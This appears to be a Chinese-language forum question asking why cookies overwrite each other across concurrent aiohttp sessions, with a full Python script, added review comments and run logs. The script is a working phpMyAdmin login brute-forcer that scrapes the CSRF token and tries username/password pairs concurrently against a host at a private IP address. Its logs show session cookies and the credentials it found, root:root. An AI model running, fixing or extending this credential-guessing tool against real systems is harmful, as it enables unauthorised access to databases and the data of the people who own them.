我使用 asyncio 和 aiohttp 请求 phpMyAdmin。每个请求任务使用不同的会话,但不同会话之间的 cookie 会互相覆盖。代码:
from asyncio import FIRST_COMPLETED
import aiohttp
import json
import re
import asyncio
from handle_log import logger
# The target is addressed by IP rather than by a DNS name; aiohttp's default
# CookieJar does not accept cookies from IP-address hosts, hence unsafe=True.
# NOTE(review): this is one module-level jar, and phpmyadmin_crack passes it to
# every ClientSession it creates, so all concurrent sessions read and write the
# same cookie store.
jar = aiohttp.CookieJar(unsafe=True)
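async def handle_request(session, url, method, data=None, **kwargs):
    """Send one GET or POST through ``session`` and return ``(status, body)``.

    Args:
        session: Object exposing aiohttp-style ``get``/``post`` calls that
            return async context managers.
        url: URL to request.
        method: ``"GET"`` or ``"POST"`` (exact, upper-case match).
        data: Form payload; only sent with POST.
        **kwargs: Accepted for call compatibility; not used.

    Returns:
        ``(status_code, response_text)`` on success. ``(None, None)`` when the
        request raises or ``method`` is not supported, so callers can always
        unpack two values.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
    }
    try:
        if method == "GET":
            request = session.get(url=url, headers=headers)
        elif method == "POST":
            # Redirects are not followed: the caller inspects the raw status
            # code of the POST response itself.
            request = session.post(url=url, headers=headers, data=data, allow_redirects=False)
        else:
            # Previously this fell off the end and returned a bare None,
            # which breaks two-value unpacking at the call sites.
            return None, None
        async with request as response:
            body = await response.text()
            return response.status, body
    except Exception:
        # Best-effort by design: any request failure is reported as
        # (None, None). The failure reason is not recorded anywhere.
        return None, None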
async def phpmyadmin_crack(host, username, password):
    """phpMyAdmin password brute-force: try one username/password pair.

    Flow as written: GET index.php and scrape the ``token`` value from the
    page, POST the login form with that token, then GET main.php and look for
    a fixed zh_CN marker string in the body.

    Returns the scraped token string when the marker is found and ``False`` on
    the explicit failure branches; when no branch returns, the result is
    ``None``.

    NOTE(review): indentation was lost in the listing this block comes from;
    the nesting below is the most plausible reading and should be confirmed
    against the original file.
    NOTE(review): every log call here writes the plaintext password, and two
    of them also write the session cookies, into the application log.
    """
    # `jar` is the module-level CookieJar, so this session shares one cookie
    # store with every other call that is running at the same time.
    async with aiohttp.ClientSession(cookie_jar=jar) as session:
        logger.info("请求用户名:{},密码{},session:{}".format(username, password, id(session)))
        url = host + "/phpmyadmin/index.php"
        # First request: fetch the login page to obtain the token.
        first_code, first_response = await handle_request(session=session, url=url, method="GET")
        # Bails out only when the body is empty AND the status is not 200.
        if not first_response and first_code != 200:
            # (disabled log: first request failed)
            return False
        if first_code == 200:
            # Extract the token from the returned page.
            token_search = re.compile(r'token=(.*?)"\s?target')
            token = token_search.search(first_response)
            if not token:
                # (disabled log: no token found in the first response)
                return False
            else:
                token_value = token.group(1)
                logger.info("第一次请求token:{},用户名:{},密码{},session:{}".format(token_value, username, password, id(session)))
                login_url = host + "/phpmyadmin/index.php"
                # Second request: submit the login form.
                login_data = {
                    "pma_username": username,
                    "pma_password": password,
                    "server": "1",
                    "lang": "zh_CN",
                    "token": token_value
                }
                second_code, second_response = await handle_request(session=session, url=login_url,
                                                                    method="POST",
                                                                    data=login_data)
                # Logs whatever the shared jar currently holds for login_url,
                # which is not necessarily what this session's POST set.
                logger.info(
                    "第二次请求cookie{},用户名{},密码{},session:{}".format(session.cookie_jar.filter_cookies(login_url), username,
                                                               password, id(session)))
                # Bails out only when the body is empty AND the status is not 302.
                if not second_response and second_code != 302:
                    # (disabled log: second request failed)
                    return False
                else:
                    # Third request: the landing page.
                    logger.info("第三次请求,用户名:{},密码{},session:{}".format(username, password, id(session)))
                    index_url = host + "/phpmyadmin/main.php?token={}".format(token_value)
                    index_code, index_response = await handle_request(session=session, url=index_url,
                                                                      method="GET")
                    if not index_response and index_code != 200:
                        # (disabled log: third request failed)
                        return False
                    if index_code == 200:
                        # Success is decided by a fixed zh_CN string in the page body.
                        if "常规设置" in index_response:
                            logger.info("登录成功cookie{},用户名{},密码{},session{}".format(session.cookie_jar.filter_cookies(index_url),
                                                                                username, password, id(session)))
                            return token_value
async def main():
    """Run phpmyadmin_crack for each username against a hard-coded password list.

    For every username, one task per password is started and the coroutine
    resumes as soon as at least one of them has finished. A truthy result
    cancels the tasks that are still pending and ends the run.

    NOTE(review): indentation was lost in the listing this block comes from;
    the nesting below is the most plausible reading — confirm against the
    original file.
    NOTE(review): when no finished task returned a truthy value, the tasks in
    `pending` are neither awaited nor cancelled before the next username
    starts, so they keep running in the background.
    """
    u = ["admin", "root"]
    p = ["root", "ccc"]
    for username in u:
        # One task per password, all started concurrently for this username.
        tasks = [asyncio.create_task(phpmyadmin_crack("http://192.168.52.143", username, password)) for password in p]
        # Returns once at least one task is done; the rest are in `pending`.
        done, pending = await asyncio.wait(tasks, return_when=FIRST_COMPLETED)
        for i in done:
            # result() re-raises any exception the task ended with.
            token_value = i.result()
            if token_value:
                # (disabled debug print of the pending set)
                for j in pending:
                    j.cancel()
                return
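if __name__ == '__main__':
    # asyncio.run() creates a fresh event loop, runs main() to completion,
    # cancels any tasks still outstanding and closes the loop. Calling
    # asyncio.get_event_loop() with no running loop is deprecated on newer
    # Python versions and never closed the loop here.
    asyncio.run(main())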
日志
2021-01-23 13:59:40,554 - 请求用户名:admin,密码root,session:61479400
2021-01-23 13:59:43,620 - 第一次请求token:83f68fe795cd035027e28b932e66af86,用户名:admin,密码root,session:61479400
2021-01-23 13:59:43,696 - 第二次请求cookieSet-Cookie: phpMyAdmin=02r13em816hravpjps4uh42o1mp37cqd
Set-Cookie: pmaPass-1=ZGyrDGMUOfY%3D
Set-Cookie: pmaUser-1=CWWqYangAdc%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=DIK05C9n3E4%3D,用户名admin,密码root,session:61479400
2021-01-23 13:59:43,697 - 第三次请求,用户名:admin,密码root,session:61479400
2021-01-23 13:59:40,556 - 请求用户名:admin,密码ccc,session:61479448
2021-01-23 13:59:40,683 - 第一次请求token:630fc3f0e38913813ae969b03be4e7d7,用户名:admin,密码ccc,session:61479448
2021-01-23 13:59:40,894 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=YQH%2B4spnAT4%3D
Set-Cookie: pmaUser-1=eN9lDZNBfIk%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名admin,密码ccc,session:61479448
2021-01-23 13:59:40,894 - 第三次请求,用户名:admin,密码ccc,session:61479448
2021-01-23 13:59:42,141 - 请求用户名:root,密码root,session:61477480
2021-01-23 13:59:42,370 - 第一次请求token:f75a63d7b1a99ceede06913c2fa028ae,用户名:root,密码root,session:61477480
2021-01-23 13:59:42,502 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=5gfZy4sGqjs%3D
Set-Cookie: pmaUser-1=5gfZy4sGqjs%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名root,密码root,session:61477480
2021-01-23 13:59:42,502 - 第三次请求,用户名:root,密码root,session:61477480
2021-01-23 13:59:43,845 - 登录成功cookieSet-Cookie: phpMyAdmin=02r13em816hravpjps4uh42o1mp37cqd
Set-Cookie: pmaPass-1=ZGyrDGMUOfY%3D
Set-Cookie: pmaUser-1=CWWqYangAdc%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=DIK05C9n3E4%3D,用户名root,密码root,session:61477480
2021-01-23 13:59:42,142 - 请求用户名:root,密码ccc,session:54297720
2021-01-23 13:59:42,503 - 第一次请求token:172c4fea1a9166732b23bda80efe80ad,用户名:root,密码ccc,session:54297720
2021-01-23 13:59:42,644 - 第二次请求cookieSet-Cookie: phpMyAdmin=l53onpkis8dq3n7cccscjmgqbjf3d0u2
Set-Cookie: pmaPass-1=YQH%2B4spnAT4%3D
Set-Cookie: pmaUser-1=5gfZy4sGqjs%3D
Set-Cookie: pma_lang=zh_CN
Set-Cookie: pma_mcrypt_iv=VoKTF6Xhr34%3D,用户名root,密码ccc,session:54297720
2021-01-23 13:59:42,644 - 第三次请求,用户名:root,密码ccc,session:54297720
正确的用户名和密码是 root:root。aiohttp 为什么会覆盖 cookie?
Set-Cookie: pmaPass-1=5gfZy4sGqjs%3D
Set-Cookie: pmaUser-1=5gfZy4sGqjs%3D
Set-Cookie: pmaPass-1=ZGyrDGMUOfY%3D
Set-Cookie: pmaUser-1=CWWqYangAdc%3D